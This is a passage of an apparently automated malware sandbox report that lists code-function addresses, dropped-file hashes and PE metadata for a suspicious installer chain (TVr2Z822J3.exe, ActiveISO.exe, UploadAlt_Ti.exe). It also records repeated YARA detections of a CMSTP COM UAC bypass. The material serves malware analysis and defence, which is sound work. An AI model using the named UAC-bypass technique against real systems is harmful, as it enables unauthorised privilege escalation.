                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201B9B010_2_00007FF6B201B9B0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD9BC10_2_00007FF6B1FCD9BC
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD9F610_2_00007FF6B1FCD9F6
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDA1C10_2_00007FF6B1FCDA1C
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDA4810_2_00007FF6B1FCDA48
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD5A7010_2_00007FF6B1FD5A70
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDA8210_2_00007FF6B1FCDA82
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDAB010_2_00007FF6B1FCDAB0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDAD610_2_00007FF6B1FCDAD6
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2003AF010_2_00007FF6B2003AF0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD1B0010_2_00007FF6B1FD1B00
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDB0B10_2_00007FF6B1FCDB0B
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FC5B3010_2_00007FF6B1FC5B30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDB3410_2_00007FF6B1FCDB34
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FC5F6010_2_00007FF6B1FC5F60
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD5FA010_2_00007FF6B1FD5FA0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD7FD010_2_00007FF6B1FD7FD0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE7FF010_2_00007FF6B1FE7FF0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE405010_2_00007FF6B1FE4050
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD40A010_2_00007FF6B1FD40A0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFBDD010_2_00007FF6B1FFBDD0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2005E3010_2_00007FF6B2005E30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE9F2010_2_00007FF6B1FE9F20
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B20123D010_2_00007FF6B20123D0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B200E3D010_2_00007FF6B200E3D0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201843010_2_00007FF6B2018430
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD444010_2_00007FF6B1FD4440
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B200C50010_2_00007FF6B200C500
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCA14010_2_00007FF6B1FCA140
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFA25010_2_00007FF6B1FFA250
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201626010_2_00007FF6B2016260
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD681010_2_00007FF6B1FD6810
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201483010_2_00007FF6B2014830
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFE85010_2_00007FF6B1FFE850
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE689010_2_00007FF6B1FE6890
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B200888010_2_00007FF6B2008880
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD48A010_2_00007FF6B1FD48A0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE08C010_2_00007FF6B1FE08C0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FC85A010_2_00007FF6B1FC85A0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE05C010_2_00007FF6B1FE05C0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCA62010_2_00007FF6B1FCA620
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE266010_2_00007FF6B1FE2660
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FDC70010_2_00007FF6B1FDC700
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B20026F710_2_00007FF6B20026F7
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD872010_2_00007FF6B1FD8720
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCEBE010_2_00007FF6B1FCEBE0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE8C6010_2_00007FF6B1FE8C60
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FECC9010_2_00007FF6B1FECC90
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2004CA010_2_00007FF6B2004CA0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2018CC010_2_00007FF6B2018CC0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FC2D3010_2_00007FF6B1FC2D30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FDE9A010_2_00007FF6B1FDE9A0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFAA0010_2_00007FF6B1FFAA00
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD8A0010_2_00007FF6B1FD8A00
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2016A1010_2_00007FF6B2016A10
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FC4A9010_2_00007FF6B1FC4A90
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD0AE010_2_00007FF6B1FD0AE0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2010B1010_2_00007FF6B2010B10
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFEF4010_2_00007FF6B1FFEF40
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FDAF4010_2_00007FF6B1FDAF40
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FEAFC010_2_00007FF6B1FEAFC0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD8FF010_2_00007FF6B1FD8FF0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201703010_2_00007FF6B2017030
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B200103010_2_00007FF6B2001030
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FED0B010_2_00007FF6B1FED0B0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE6DA010_2_00007FF6B1FE6DA0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2002DC010_2_00007FF6B2002DC0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C8E9E010_2_00007FFB09C8E9E0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCF95010_2_00007FFB09CCF950
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9E91010_2_00007FFB09C9E910
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCE8D410_2_00007FFB09CCE8D4
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CDB8D010_2_00007FFB09CDB8D0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCE8C910_2_00007FFB09CCE8C9
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCE8BE10_2_00007FFB09CCE8BE
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C85C6010_2_00007FFB09C85C60
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09D0BC6010_2_00007FFB09D0BC60
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCDC4010_2_00007FFB09CCDC40
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C98BE010_2_00007FFB09C98BE0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9CBE010_2_00007FFB09C9CBE0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CBEBE010_2_00007FFB09CBEBE0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CB2B6010_2_00007FFB09CB2B60
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CE1B9010_2_00007FFB09CE1B90
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCCB3010_2_00007FFB09CCCB30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CFAB1010_2_00007FFB09CFAB10
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9AB1010_2_00007FFB09C9AB10
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCEE7410_2_00007FFB09CCEE74
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCEE6C10_2_00007FFB09CCEE6C
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CE5E6010_2_00007FFB09CE5E60
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCEE9510_2_00007FFB09CCEE95
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCEE7C10_2_00007FFB09CCEE7C
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CC2E8010_2_00007FFB09CC2E80
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CBBE3010_2_00007FFB09CBBE30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CC6E3010_2_00007FFB09CC6E30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCEE4F10_2_00007FFB09CCEE4F
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09D4FE0010_2_00007FFB09D4FE00
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CD0E1510_2_00007FFB09CD0E15
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCAE0010_2_00007FFB09CCAE00
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CD0DC010_2_00007FFB09CD0DC0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CE0D7010_2_00007FFB09CE0D70
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CA3D9010_2_00007FFB09CA3D90
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C8DD2010_2_00007FFB09C8DD20
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CC3D1010_2_00007FFB09CC3D10
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C99CA010_2_00007FFB09C99CA0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CBE04010_2_00007FFB09CBE040
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCDFC010_2_00007FFB09CCDFC0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9BF4010_2_00007FFB09C9BF40
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CA4EE010_2_00007FFB09CA4EE0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCBF1010_2_00007FFB09CCBF10
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CC827010_2_00007FFB09CC8270
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CC427010_2_00007FFB09CC4270
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CD028010_2_00007FFB09CD0280
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CAB25010_2_00007FFB09CAB250
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09D081E010_2_00007FFB09D081E0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C8A18010_2_00007FFB09C8A180
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCB12010_2_00007FFB09CCB120
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCC0F010_2_00007FFB09CCC0F0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CB20B010_2_00007FFB09CB20B0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CD109F10_2_00007FFB09CD109F
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CE50D010_2_00007FFB09CE50D0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CBF42010_2_00007FFB09CBF420
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CD244010_2_00007FFB09CD2440
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CD144010_2_00007FFB09CD1440
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCD41010_2_00007FFB09CCD410
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CC03B010_2_00007FFB09CC03B0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CAE2F010_2_00007FFB09CAE2F0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CB966010_2_00007FFB09CB9660
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C8663010_2_00007FFB09C86630
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9762010_2_00007FFB09C97620
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CDF61010_2_00007FFB09CDF610
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9E4F010_2_00007FFB09C9E4F0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CEE51010_2_00007FFB09CEE510
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CB350010_2_00007FFB09CB3500
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C974BA10_2_00007FFB09C974BA
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9B4B010_2_00007FFB09C9B4B0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09C9749E10_2_00007FFB09C9749E
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCE87010_2_00007FFB09CCE870
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CD288010_2_00007FFB09CD2880
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CEE88010_2_00007FFB09CEE880
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CBC82010_2_00007FFB09CBC820
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CA780010_2_00007FFB09CA7800
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CCC7B010_2_00007FFB09CCC7B0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CDD78010_2_00007FFB09CDD780
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CA672010_2_00007FFB09CA6720
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CEE71010_2_00007FFB09CEE710
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CC070010_2_00007FFB09CC0700
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CDE6C010_2_00007FFB09CDE6C0
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\ActiveISO.exe 588CB61B36A001384A2833BD5DF8D7982CA79D6AE17A3D83A94E01B1E79684BD
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: String function: 00007FF6B1FFB3F0 appears 49 times
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: String function: 0040243B appears 37 times
                  Source: C:\Users\user\ActiveISO.exeCode function: String function: 00007FF65374B3F0 appears 49 times
                  Source: UploadAlt_Ti.exe.11.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
                  Source: itpyyyx.25.drStatic PE information: Number of sections : 12 > 10
                  Source: josveh.11.drStatic PE information: Number of sections : 12 > 10
                  Source: TVr2Z822J3.exe, 00000006.00000000.1274501283.000000000041A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1276248317.00000000024C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQt5Gui.dll( vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQt5Network.dll( vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQt5PrintSupport.dll( vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQt5Core.dll( vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000002.1364214147.00000000005F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameActiveISO.exeH vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQt5Widgets.dll( vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStarBurn vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs TVr2Z822J3.exe
                  Source: TVr2Z822J3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 17.2.cmd.exe.2d84a78.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 27.2.UploadAlt_Ti.exe.26b5a20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 27.2.UploadAlt_Ti.exe.26faaed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 25.2.cmd.exe.509e6cd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.cmd.exe.4d6facd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.cmd.exe.503da00.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 15.2.UploadAlt_Ti.exe.26a2aed.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.cmd.exe.2db07f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 25.2.cmd.exe.5058a00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 27.2.UploadAlt_Ti.exe.26fb6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.cmd.exe.4d2aa00.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 15.2.UploadAlt_Ti.exe.26a36ed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 25.2.cmd.exe.509dacd.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.cmd.exe.4d706cd.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.cmd.exe.5082acd.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
